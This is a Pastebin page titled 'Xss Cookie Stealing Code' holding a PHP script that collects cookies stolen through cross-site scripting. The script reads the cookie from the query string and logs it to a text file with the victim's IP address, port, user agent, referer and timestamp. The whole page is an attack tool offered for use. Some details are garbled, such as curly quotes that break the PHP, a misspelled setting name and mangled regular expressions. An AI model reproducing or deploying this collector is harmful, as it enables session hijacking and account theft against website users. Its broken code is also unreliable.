SHARE
TWEET

Xss Cookie Stealing Code by Ahmed Raza Memon

a guest May 16th, 2016 378 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. function GetIP()
  3. {
  4.     if (getenv(“HTTP_CLIENT_IP”) && strcasecmp(getenv(“HTTP_CLIENT_IP”), “unknown”))
  5.         $ip = getenv(“HTTP_CLIENT_IP”);
  6.     else if (getenv(“HTTP_X_FORWARDED_FOR”) && strcasecmp(getenv(“HTTP_X_FORWARDED_FOR”), “unknown”))
  7.         $ip = getenv(“HTTP_X_FORWARDED_FOR”);
  8.     else if (getenv(“REMOTE_ADDR”) && strcasecmp(getenv(“REMOTE_ADDR”), “unknown”))
  9.         $ip = getenv(“REMOTE_ADDR”);
  10.     else if (isset($_SERVER[‘REMOTE_ADDR’]) && $_SERVER[‘REMOTE_ADDR’] && strcasecmp($_SERVER[‘REMOTE_ADDR’], “unknown”))
  11.         $ip = $_SERVER[‘REMOTE_ADDR’];
  12.     else
  13.         $ip = “unknown”;
  14.     return($ip);
  15. }
  16. function logData()
  17. {
  18.     $ipLog=”log.txt”;
  19.     $cookie = $_SERVER[‘QUERY_STRING’];
  20.     $register_globals = (bool) ini_get(‘register_gobals’);
  21.     if ($register_globals) $ip = getenv(‘REMOTE_ADDR’);
  22.     else $ip = GetIP();
  23.     $rem_port = $_SERVER[‘REMOTE_PORT’];
  24.     $user_agent = $_SERVER[‘HTTP_USER_AGENT’];
  25.     $rqst_method = $_SERVER[‘METHOD’];
  26.     $rem_host = $_SERVER[‘REMOTE_HOST’];
  27.     $referer = $_SERVER[‘HTTP_REFERER’];
  28.     $date=date (“l dS of F Y h:i:s A”);
  29.     $log=fopen(“$ipLog”, “a+”);
  30.  
  31.     if (preg_match(“/bhtmb/i”, $ipLog) || preg_match(“/bhtmlb/i”, $ipLog))
  32.         fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>”);
  33.     else
  34.         fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie nn”);
  35.     fclose($log);
  36. }
  37. logData();
  38. ?>
RAW Paste Data
Top